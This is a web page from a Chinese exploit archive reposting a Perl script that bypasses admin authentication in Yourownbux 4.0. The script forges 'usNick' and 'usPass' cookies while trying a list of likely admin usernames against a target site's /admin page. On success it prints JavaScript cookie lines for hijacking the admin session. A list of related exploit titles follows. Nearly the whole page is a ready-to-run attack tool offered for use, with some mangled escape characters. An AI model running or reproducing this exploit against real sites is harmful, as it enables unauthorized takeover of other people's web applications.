手机
当前位置:查字典教程网 >网络安全 >Exploit >Yourownbux 4.0 (COOKIE) Authentication Bypass Exploit
Yourownbux 4.0 (COOKIE) Authentication Bypass Exploit
摘要:#!/usr/bin/perluseLWP::UserAgent;useHTTP::Request;#-------------------...

#!/usr/bin/perl

use LWP::UserAgent;

use HTTP::Request;

# ------------------------------------------------------------------------------------------------- -#

# Yourownbux v4.0 ------------------------------------------------------------ --

# Cookie Modification Exploit -----------------------------------------------------------------

# Discovered By: Tec-n0x | 04/9/2008 --------------------------------------------------------

#

# Dropsec.com

#

# Modify The Line 39, Adding More User's that can be the admin username------------

#

# Gr33tz: Celciuz, OzX, N.O.X, MurdeR, Syst3m-c0d3r && All Friends --

# ------------------------------------------------------------- ----------------------------------------#

system("clear");

print "

# Yourownbux v4.0 Cookie Modification Exploitn# Discovered By: Tec-n0xnn# Tec-n0x [ at ] hotmail [ dot ] com > DropSec.com

nn";

print "Target [ Example: www.sitedemo.com ] :n> ";

$target = <STDIN>;

chop($target);

if($target =~ m/www.(.*).(.*)/) {

$other = $1;

check1($target);

} else {

print "nInvalid Target.";

exit();

}

sub explote {

@tryusers = ("admina", "administrator", "admins", "admin", "master", "manager", "root", "$other");

# Add Posible Users.

$check = shift;

foreach $user (@tryusers) {

$pass = "Tec-n0x";

print "ntTrying > $usern";

$browser = LWP::UserAgent->new();

$browser->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14");

$browser->default_header("Cookie" => "usNick=$user; usPass=$pass");

$get = HTTP::Request->new(GET => $check);

$resp = $browser->request($get);

$content = $resp->content();

@code = split("n",$content);

foreach $checka (@code) {

if($checka =~ m/Emails|Served|Workload|Overview/) {

system("clear");

print "Succesfull EXPLOTED ...!!nnValid Username: $usernnGo to: $checknn And Put this on your browser:";

$vd = "javascript:document.cookie = "usNick=$user; path=/";";

$vda = "javascript:document.cookie = "usPass=Dropsec.com; path=/";";

print "

------------------------------------

$vdn $vda

------------------------------------

";

$yes = 1;

exit();

}

}

}

if($yes != 1) {

print "nnnExploit Failed";

exit();

}

}

sub check1 {

$target = shift;

$check = "http://$target/admin/index.php";

$browser = LWP::UserAgent->new();

$browser->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14");

$get = HTTP::Request->new(GET => $check);

$resp = $browser->request($get);

$content = $resp->content();

@code = split("n",$content);

foreach $checka (@code) {

if($checka =~ m/You must login as administrator to access this page/) {

print "Check 1 [ OK ]n";

$success = 1;

explote($check);

}

}

if($sucess != 1) {

print "Failed";

exit();

}

}

【Yourownbux 4.0 (COOKIE) Authentication Bypass Exploit】相关文章:

Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability

Friendly Technologies (fwRemoteCfg.dll) ActiveX Command Exec Exploit

HIOX Browser Statistics 2.0 Arbitrary Add Admin User Exploit

PHP 4.4.5 / 4.4.6 session_decode() Double Free Exploit PoC

BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (spoof on ircd)

Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit

Wordpress 2.6.1 (SQL Column Truncation) Admin Takeover Exploit

Boonex Dolphin 6.1.2 Multiple Remote File Inclusion Vulnerabilities

Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BOF Exploit

Easy Photo Gallery 2.1 XSS/FD/Bypass/SQL Injection Exploit

精品推荐
分类导航